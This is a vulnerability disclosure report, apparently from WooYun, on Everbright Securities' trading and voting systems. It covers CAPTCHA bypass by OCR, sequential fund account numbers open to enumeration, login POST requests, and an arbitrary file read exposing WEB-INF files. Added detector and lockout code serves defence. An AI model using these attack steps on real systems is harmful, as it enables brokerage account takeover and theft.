
Everbright Securities (光大证券) trading system: fund account numbers can be enumerated by brute force

2015-03-03 18:30

#1 The online voting system accepts login with the trading system's fund account number

https://116.236.247.174/vote/views/login.html?r=0.6828486339654773

[screenshot: 1.png]

[screenshot: sc1.png]



The CAPTCHA is far too simple and can be recognised with 100% accuracy

Binarize with a threshold of 100, invert the colours, and OCR recognises it immediately

[screenshot: soft1.jpg]



https://116.236.247.174/servlet/Image

[screenshot: Image.jpeg]



Code block:
http://www.80vul.com/yzm/v.php?url=http://hackdig-h.stor.sinaapp.com/pictures/month_1503/201503031830441843.jpeg



[screenshot: 8267.jpg]



e.ebscn.com: even the live online trading system's CAPTCHA is recognised directly

[screenshot: login.png]



Code block:
http://www.80vul.com/yzm/v.php?url=https://e.ebscn.com/servlet/Image

[screenshot: ebscn_online.jpg]



#2 There is a password control, but by simulating the plugin's submission from the client side (with the 按键精灵 keystroke-automation tool) the attack can be automated; more importantly, the file disclosure vulnerability described below leaks the entire server-side algorithm

Login flow of the online trading system

Code block:
POST /servlet/json HTTP/1.1
Host: e.ebscn.com
Content-Length: 401
Accept: application/json, text/javascript, */*; q=0.01
Origin: https://e.ebscn.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://e.ebscn.com/fortune/views/login/login.html?pageCode=c9uqlQ6BD4s+5tn1CfS2ofvHHmtKwYn5OXD/fMt+2ILmROaEyaeL/dpqgC+b7G8NHFpGo7aib7U=
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4
Cookie: CNZZDATA1253545433=1426607054-1421495858-%7C1421495858; JSESSIONID=abcPl8LLMD2KZbN_xW3Ru; user=JqcYG4oOxWE=
Connection: Keep-Alive

funcNo=1001103&fund_account=20431103&trade_pwd=BDE46B39A09835E813E196C2C30E3737B0A63F346A729F2FB99163157901B3B2B5FA249936F999E9C16871C38921182EE89D52028608B00D6ABC2378E77BF78126594BDF4F1D91457686820662D940BD8C2351D79502BC4783C337D6E84C7B83231B0E0C8ADE6A916E5F42295A5DBC7BCEE1D7F3F5C240EFE93DA3A96789A43%257C7cW5peJvDxQ%253D&ticket=gde8&mac=EC-17-2F-77-FF-E2%257C00-50-56-C0-00-01%257C00-50-56-C0-00-08



Code block:
POST /servlet/json HTTP/1.1
Host: 116.236.247.174
Content-Length: 473
Accept: application/json, text/javascript, */*; q=0.01
Origin: https://116.236.247.174
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://116.236.247.174/vote/views/login.html?r=0.39641681080684066
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4
Cookie: JSESSIONID=abcCqhi9V75DU4i4xUZRu; ip=192.168.198.1|192.168.68.1|192.168.199.120; mac=EC-17-2F-77-FF-E2|00-50-56-C0-00-01|00-50-56-C0-00-08
Connection: Keep-Alive

funcNo=940001&branch_no=&type=pc&account=20431113&password=31AE0E880987FCBC2A2209B77E2DE3C513FC4B50FEDFC1D923550AE0FBC30425FF1D33363195F1B581813502114B88E01E9D80BBFA5C317C389BC1F295EE4E636441030CD56038133A82C6E182A4DA081C53D5335F9E4FB0DC1F6647D7B8DE1C5AC45BE3648D3666EBC72299C0F065583D36112139B2ACFC80ACD9254BB702C1%257CIyv8VycBegk%253D&verify_code=6768&mac=EC-17-2F-77-FF-E2%257C00-50-56-C0-00-01%257C00-50-56-C0-00-08&ip=192.168.198.1%257C192.168.68.1%257C192.168.199.120





#3 The 8-digit fund account numbers are generated sequentially

account=20441102: iterate through the account numbers to enumerate them
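One way a defender can spot this enumeration in web-server logs, as an added example that is not part of the original report: group the `funcNo=940001` login calls (the voting-system POST shown in #2) by client and check whether the distinct `account` values form a near-sequential run. The log format, the thresholds and the sample lines below are constructed for the example, not taken from any real system.

```python
"""Detect sequential fund-account enumeration against the login endpoint.

Added example, not part of the original report. The log format, the field
layout and the sample lines are constructed (hypothetical), modelled on the
POST /servlet/json request in the report: funcNo=940001 is the voting-system
login call and `account` carries the 8-digit fund account number.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qs

# Constructed sample log, one request per line:
# "<client_ip> <session_id> <path> <form_body>"
SAMPLE_LOG = """\
203.0.113.10 sessA /servlet/json funcNo=940001&type=pc&account=20431101&password=AA&verify_code=1234
203.0.113.10 sessA /servlet/json funcNo=940001&type=pc&account=20431102&password=AA&verify_code=8812
203.0.113.10 sessA /servlet/json funcNo=940001&type=pc&account=20431103&password=AA&verify_code=0091
203.0.113.10 sessA /servlet/json funcNo=940001&type=pc&account=20431104&password=AA&verify_code=5522
203.0.113.10 sessA /servlet/json funcNo=940001&type=pc&account=20431105&password=AA&verify_code=7710
198.51.100.7 sessB /servlet/json funcNo=940001&type=pc&account=20499001&password=BB&verify_code=3344
198.51.100.7 sessB /servlet/json funcNo=940001&type=pc&account=20499001&password=CC&verify_code=9090
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+)$")
LOGIN_FUNC = "940001"        # voting-system login call, from the report
LOGIN_PATH = "/servlet/json"


def parse_log(text):
    """Yield (ip, session, path, params) for each well-formed log line."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, session, path, body = m.groups()
        yield ip, session, path, parse_qs(body)


def account_attempts(text):
    """Collect the distinct 8-digit account values each client tried on the
    login call, in the order they were first seen."""
    attempts = defaultdict(list)
    for ip, _session, path, params in parse_log(text):
        if path != LOGIN_PATH or params.get("funcNo", [""])[0] != LOGIN_FUNC:
            continue
        account = params.get("account", [""])[0]
        if re.fullmatch(r"\d{8}", account) and account not in attempts[ip]:
            attempts[ip].append(account)
    return attempts


def detect_enumeration(text, min_accounts=5, max_gap=10):
    """Flag clients that tried at least min_accounts distinct accounts whose
    numeric values form a near-sequential run (every step between sorted
    values is 1..max_gap): the signature of walking an ordered account space.
    A client retrying one account with different passwords is not flagged."""
    alerts = []
    for ip, accounts in account_attempts(text).items():
        if len(accounts) < min_accounts:
            continue
        values = sorted(int(a) for a in accounts)
        steps = [b - a for a, b in zip(values, values[1:])]
        if all(0 < s <= max_gap for s in steps):
            alerts.append({"ip": ip, "count": len(accounts),
                           "first": accounts[0], "last": accounts[-1]})
    return alerts


if __name__ == "__main__":
    for alert in detect_enumeration(SAMPLE_LOG):
        print(f"enumeration from {alert['ip']}: {alert['count']} accounts "
              f"{alert['first']}..{alert['last']}")
```

The thresholds are deliberately low so the constructed sample triggers; in production the client key would normally combine source IP with the session cookie, and the same grouping can be applied to the trading-system call (`funcNo=1001103`, field `fund_account`) shown earlier.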



#4 The risk-assessment site's CAPTCHA can likewise be recognised, so the enumerated account numbers can be used to guess passwords

Code block:
http://www.80vul.com/yzm/v.php?url=https://cust.ebscn.com/ValidateCode.aspx

[screenshot: 6281.jpg]

[screenshot: custlogin.jpg]

Proof of vulnerability:

#4 Arbitrary file download (including the server-side password decryption algorithm, the CAPTCHA generation algorithm, and so on)

Because the Everbright Securities online voting system's server is misconfigured, arbitrary server-side files can be read

https://116.236.247.174/WEB-INF/web.xml

[screenshot: webxml.jpg]



The login-verification servlet and the CAPTCHA servlet are both listed; load the classes in jd-gui and they decompile straight back to source

Code block:
<servlet-mapping>
  <servlet-name>BusService</servlet-name>
  <url-pattern>/servlet/json</url-pattern>
</servlet-mapping>
<servlet>
  <servlet-name>BusService</servlet-name>
  <servlet-class>com.thinkive.tbservice.action.TBClientServlet</servlet-class>
  <init-param>



Code block:
<display-name>web</display-name>
<!-- filter definition begin -->
<filter>
  <filter-name>CORS</filter-name>
  <filter-class>com.thetransactioncompany.cors.CORSFilter</filter-class>
  <init-param>
    <param-name>cors.allowOrigin</param-name>
    <param-value>*</param-value>
  </init-param>
  <init-param>
    <param-name>cors.supportedMethods</param-name>
    <param-value>GET, POST, HEAD, PUT, DELETE</param-value>
  </init-param>
</filter>
<filter>
  <filter-name>Encoding</filter-name>
  <filter-class>
    com.thinkive.web.common.filter.SetCharacterEncodingFilter
  </filter-class>
  <init-param>
    <param-name>encoding</param-name>
    <param-value>UTF-8</param-value>
  </init-param>
</filter>
<!-- filter-mapping definition begin -->
<filter-mapping>
  <filter-name>CORS</filter-name>
  <url-pattern>/*</url-pattern>
</filter-mapping>
<filter-mapping>
  <filter-name>Encoding</filter-name>
  <url-pattern>*.htm</url-pattern>
</filter-mapping>
<filter-mapping>
  <filter-name>Encoding</filter-name>
  <url-pattern>*.jsp</url-pattern>
</filter-mapping>
<filter-mapping>
  <filter-name>Encoding</filter-name>
  <url-pattern>/servlet/*</url-pattern>
</filter-mapping>
<filter-mapping>
  <filter-name>Encoding</filter-name>
  <url-pattern>/cgi-bin/*</url-pattern>
</filter-mapping>
<!-- filter-mapping definition end -->
<!-- listener definition begin -->
<listener>
  <listener-class>
    com.thinkive.base.listener.ApplicationLifecycleListener
  </listener-class>
</listener>
<!-- listener definition end -->
<!-- servlet definition begin -->
<servlet>
  <servlet-name>FastServlet</servlet-name>
  <servlet-class>com.thinkive.web.base.FastServlet</servlet-class>
  <load-on-startup>0</load-on-startup>
</servlet>
<servlet>
  <servlet-name>SSIServlet</servlet-name>
  <servlet-class>com.thinkive.web.common.servlet.SSIServlet</servlet-class>
  <init-param>
    <param-name>encoding</param-name>
    <param-value>GBK</param-value>
  </init-param>
  <load-on-startup>0</load-on-startup>
</servlet>
<servlet>
  <servlet-name>fxckhTicketImg</servlet-name>
  <servlet-class>com.thinkive.tbservice.action.BuildImageServlet</servlet-class>
</servlet>
<servlet>
  <servlet-name>BusService</servlet-name>
  <servlet-class>com.thinkive.tbservice.action.TBClientServlet</servlet-class>
  <init-param>
    <param-name>isSaveResult</param-name>
    <param-value>0</param-value>





# Use jd-gui to decompile the Java classes back to readable source; the whole site could even be reconstructed from them

WooYun: Qunar (去哪儿) arbitrary file read (the system's original project can essentially be reconstructed)

https://116.236.247.174/WEB-INF/classes/com/thinkive/base/listener/ApplicationLifecycleListener.class

[screenshot: jd_ebscn.jpg]



In this country, anything to do with stocks and money is sensitive and puts people on edge; yet an account that had been tried many times could still log in from the mobile client and had not been locked

[screenshot: login2.jpg]

Remediation:

# Strengthen the CAPTCHA algorithm

# Remove the leaked files
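The report's closing observation is that an account tried many times could still log in from the mobile client, so the two fixes above leave the sequential account space unprotected against slow guessing. The following is an added example, not code from the report or from Everbright Securities: an in-memory guard that counts failed logins per fund account and per source IP, shared by every channel (PC, mobile, voting site), so that a lock placed on one channel holds on the others. The thresholds, window and lock durations are assumptions chosen for illustration.

```python
"""Per-account and per-source failed-login throttling shared across channels.

Added example, not code from the report or from Everbright Securities.
Policy numbers are assumptions: 5 failures per account or 20 per source IP
within a 15-minute window lock that key for 30 minutes.
"""
import time
from collections import defaultdict, deque

WINDOW = 15 * 60          # seconds over which failures are counted (assumed)
LOCK_SECONDS = 30 * 60    # lock duration once a limit is hit (assumed)
ACCOUNT_LIMIT = 5         # failures per 8-digit fund account (assumed)
SOURCE_LIMIT = 20         # failures per source IP, across all accounts (assumed)


class LoginGuard:
    """Failure counters keyed by ("acct", account) and ("src", ip).

    The per-account counter is what the report found missing: it must be
    checked by every login channel, not only the one the failures came from.
    The per-source counter catches one guess per account across a sequential
    account range, which never trips the per-account limit on its own."""

    def __init__(self, clock=time.time):
        self.clock = clock                   # injectable for testing
        self.failures = defaultdict(deque)   # key -> timestamps of failures
        self.locked_until = {}               # key -> unlock time

    def _recent_failures(self, key, now):
        """Drop failures older than WINDOW and return the live deque."""
        q = self.failures[key]
        while q and now - q[0] > WINDOW:
            q.popleft()
        return q

    def is_locked(self, key):
        now = self.clock()
        until = self.locked_until.get(key)
        if until is None:
            return False
        if now >= until:                     # lock expired: start clean
            del self.locked_until[key]
            self.failures[key].clear()
            return False
        return True

    def allow_attempt(self, account, source_ip):
        """True only if neither the account nor the source is locked."""
        return not (self.is_locked(("acct", account))
                    or self.is_locked(("src", source_ip)))

    def record_failure(self, account, source_ip):
        """Count one failed login against both keys; lock a key at its limit."""
        now = self.clock()
        for key, limit in ((("acct", account), ACCOUNT_LIMIT),
                           (("src", source_ip), SOURCE_LIMIT)):
            q = self._recent_failures(key, now)
            q.append(now)
            if len(q) >= limit:
                self.locked_until[key] = now + LOCK_SECONDS

    def record_success(self, account):
        """A successful login resets the account's failure history."""
        self.failures[("acct", account)].clear()


if __name__ == "__main__":
    fake_now = [1_000.0]
    guard = LoginGuard(clock=lambda: fake_now[0])
    for _ in range(ACCOUNT_LIMIT):
        guard.record_failure("20431103", "203.0.113.10")   # constructed values
    # Locked for the mobile client too, even from a different source address.
    print("mobile login allowed:", guard.allow_attempt("20431103", "198.51.100.7"))
    fake_now[0] += LOCK_SECONDS + 1
    print("allowed after lock expiry:", guard.allow_attempt("20431103", "198.51.100.7"))
```

In a real deployment the counters live in a shared store (a database or cache reachable from every login front end) rather than in process memory, and a lock should return the same generic error as a wrong password so the response does not itself confirm which account numbers exist.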


Source: www.wooyun.org/bugs/wooyun-2015-092415
